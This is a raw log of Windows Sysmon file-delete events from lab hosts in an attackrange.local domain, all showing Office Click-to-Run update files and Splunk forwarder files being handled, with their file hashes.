Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTrial-ppd.xrm-msMD5=3B9700EFB4008756F208416104BE6DBF,SHA256=ED52B0821A47789D65EB19167D53BA2894CED89B4EA56759FCE9370CD207EE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTrial-pl.xrm-msMD5=8B6907E6AB8D3A3A408C49E5B59BBA3A,SHA256=F2251E610315091CEB2A985C46EBF1786F280DC05D950CA4EC1B578288E987C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-msMD5=42CAFA1EECA81F7E411276C91021D89E,SHA256=5251BC813D0FBE4030EBA9C50401DC88B97843EC121FD07E3B05C91BE8FB34B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTest-ppd.xrm-msMD5=EF867BABFE4DCBC6659FC4015527526F,SHA256=E3A311A556234DAB92357A61D238BB7B13BEF8B76C466D9A4857DA69D48DA5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365BusinessR_SubTest-pl.xrm-msMD5=49DA6DCF71C909A04DA177E2CA38E648,SHA256=5147506FC2189A0B79EFD37051762B6930C166E3CE83C9B7D815E0DCC678DCA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049729Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:14.581{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C432737093B99BFA440FACC48610EFB,SHA256=34063B9B50746335D2F54B8FF40E1E39DDFA49AED011A8BAE12429F4C78D3DAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049728Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:14.190{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30755614F794607DE54C5223A6CD5802,SHA256=5FD69E1DCBFED1446A88C9C6AF849435CC7A11B77E3E43299833A0E1A632CF28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\shaded.dotxMD5=AD64BC506AF0A08EB09A04AF6E6A97EF,SHA256=0F113AC162264C1B9C9E28204706593A9DF88B8DE3098688FD77971ED0D92936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\minimalist.dotxMD5=AFFC0CDFFAB09601FBEC3925D2F92EB8,SHA256=719C4E5A817E3DDFD12FA1663CBA8D08819082463DEAA47B5D2F98417BC1734A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\linesstylish.dotxMD5=EBEB95BE1C93DD48FB7378C317E1A805,SHA256=593F169990E6046ED850D975CF30A2C6B8039ED425AAC36DF4E1F720A2A24ADE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\linessimple.dotxMD5=3438E6F7F494A5C633F94486B635C7BD,SHA256=3B1A67DDD452CD860CB84C4B1B6C885B9819C45F253C3E1D8420879389FCC0C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\linesdistinctive.dotxMD5=456AE30E6BFD0C55F1244D0DBB9AB9B2,SHA256=C8240D580F781FA1EE5ECA7052B046DB4FE21434A9BBAF903A5C15F9701928FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\Default.dotxMD5=C4BD139C3C4572E8C814C02AE557C8D3,SHA256=DF48A1E8AFA8F45B53FF8EFFEA1B04DF26D73C5770B08ED801D80B18A075F301,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\Classic.dotxMD5=BE6B30BC31A915E6A19A7F4A7BA0D46C,SHA256=DD6DB88EE73C8F7ABBA26D6260E4CA37EC29780F5852FF8622E9DC6A0662D9F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\centered.dotxMD5=8355ADF3C49D9EFD277C498537BABA2B,SHA256=94F89A2D53DC3E27FCF66C3D4BD7EF4CFF7C363101A92FB165A38B9A05ED4E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\casual.dotxMD5=47EE35A98FCC235BD91CB16AD52AD9FF,SHA256=FB28DF1D8B8E6B5838C024936F9109FCCB6B8E768EEDB98A70F05655E93F0C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\bwnumbered.dotxMD5=3C6153193A6219B2DF1E8749EA359EE9,SHA256=FC3C3DE1FBB1FC0B9F856D7D64AA60493C03A34499451DC48B47F2078C5A3772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\bwclassic.dotxMD5=BC1B5FF467378A292AFF16F8EEA44B25,SHA256=2379A8DC38C65B4B030AFF40368A83760E349504D0682A737214BA687BF32502,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\bwcapitalized.dotxMD5=A32A19E6BE93033FAE8E47B16D1DC329,SHA256=03D0506771BF9F2F70A916211B783B42F2069B90A2EB309B72884AE539604E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\basicstylish.dotxMD5=4A4DA62AF5E0A6567EF77FC5E993FB8E,SHA256=AFA7BCE1660C75249E8E0B245E29A5C4E7FA3006E090638EDBE953A772F664B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\basicsimple.dotxMD5=8AE8E84A0B3C5EF82AE7DC3497612738,SHA256=55D34ACFC2D724A54AF66C227C95ABF0F430D7C0EB7C0617C350A70C6158DA78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\basicelegant.dotxMD5=BB1EDBB3DB7FA3B0F97E53A15C5714DB,SHA256=E3F813BF50C5B35B775AD7C33E1E90D87C4E3FAA7B23237EE2C56474AC28880C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR9F.GIFMD5=8BAE1D711C55EFC4A52D316554A2F2E5,SHA256=DBDBB7B0EBA8010A3641B84CE230CD3C155CA3BA05EF160248AF8E5144D45F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR9B.GIFMD5=FFE541A50124156776D45AEE2EC73B10,SHA256=599DFB85BD219D22BD2BB72F66E832313CCD9B86C5B5B752290B452C41A25B56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR8F.GIFMD5=FCCDA913EA185FC6282FD7EA4E216CA6,SHA256=C24C6414BFB29FE26DD57131C724BF57CE93B2AA168247DB85659496A52FB993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR8B.GIFMD5=372477FAD67409029AA4C88A7C4C2178,SHA256=F249F0D968B9F9F95036F6735FB8081FF9F7C96ED8345EF743F01E55D79598AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR7F.GIFMD5=96355B42E1C8E464C5245D0DE38D2D24,SHA256=8A4EFB6455827E97F88407F39D7E238744D943D798096771AE59ED30E6FB6241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR7B.GIFMD5=6E1E956DE338594194E5CA8318E15D14,SHA256=2CF5E526D0A84B92C165EFD3BD1C425908B68363D5E47D7D82478B2BEE6EC451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR6F.GIFMD5=5B363872B18686A9AA9AE99EFC05483D,SHA256=70F6075E3DDB1B490118810929CB822CE27C7D28A8AACB770B78EFFF1C6CF307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR6B.GIFMD5=54D8E52DF627B2563C375B50ADFB2316,SHA256=8F594F26182A1DBE9A119DF8CA66950D2509C68A9FD31FD74B95588B9D747BC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR5F.GIFMD5=ABA0D1090B656A5DFF0FDB477FBC7703,SHA256=565DDEB7328B309759A8B544C41B645174AA5AB0EBC2536C92F5C47C01C9C304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR5B.GIFMD5=6CB299B11E998A121BD154C3FC213D74,SHA256=E23FC8744E7F6BE93D9B4D93B9DD457D241C76CF162296535D83A4CDABAB655D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR51F.GIFMD5=9CCE5EB3159858FA08CFC9A7A65EF364,SHA256=5AF00198104222D16CBE0C4BFE389A4541A7C6C1C2A1661E3BF89C4A1CB4EA0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR51B.GIFMD5=D3350E0B1A37DC326867F327A30FE509,SHA256=C4FA8427A408302293D220E4F7130AEA454D3F93670F5D8EB7CC7B339FB4ACD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR50F.GIFMD5=9F85E7CBCC41663653B8CD40CA41E8BB,SHA256=DE33D716F8D57644E68CBD0922A4A77566D71D8B59DB34CF828D8F222CDC07C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR50B.GIFMD5=C64359AD2D98C5B710500CED02F926F4,SHA256=404F48BC82E71296DD07768FF4B2747A0932E7EE98F14B0BFBCAE67336265796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR4F.GIFMD5=B8F81816ACF4D2E496FE589C7A9EA51B,SHA256=2D5CC1D584E0C5874A0284FA52AFB0DAE1E36053E0A7BB45DCBA01B9DE6C69ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR4B.GIFMD5=D8324DBA667259DF7BFFE26BA1E4A21F,SHA256=542E68FD8F49F9F14D699F324D7B551ED243E00FBBC0386EDC3E423E88586F4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR49F.GIFMD5=AD152732BB1BA7620F6E5355F84FD515,SHA256=6CB4E779EA0D91C8461302BBEC8DC34CBF0C7D56A66CF864FE8327483DD5473C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR49B.GIFMD5=BA25B44E558C03FE9D207F1D0E3D8F7D,SHA256=A6F864A21A1FBA44E38D0530DF41881587CEBB72EC1B836ED2D910C4B2E3F534,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR48F.GIFMD5=7DB2A2554734C284750FF81BA9C235E5,SHA256=8072FA04BF686071CF517DC6FFA99A78E21808CF7143EB487089DA53FF8C8AE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR48B.GIFMD5=8102C5186EC6BA37FA22E6E1D6FCBD32,SHA256=D3CEB27F60768E5E7136E3699CDD2C0826490E3E2EF0F930CBA1DC82F2BF8A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR47F.GIFMD5=D1C23AF64AA38CBE2CABB92F197968BD,SHA256=3F5FCB713F907418C272C3E75529FAD00F6A969A6332057ABB0458A0CDBF9445,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR47B.GIFMD5=B44089EC2B255EC88BFF452AC06CE678,SHA256=FDDFA01D62825A89267AA8B40E28058587BCEFB215185E7FE63231C246C321A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR46F.GIFMD5=002F3F1D507BC5559C905C6AEFD0C209,SHA256=C875E380B985CFDA2F769B0BF6ED7B1137CABC7813100B933A8E820B260F6890,IMPHASH=00000000000000000000000000000000falsetrue 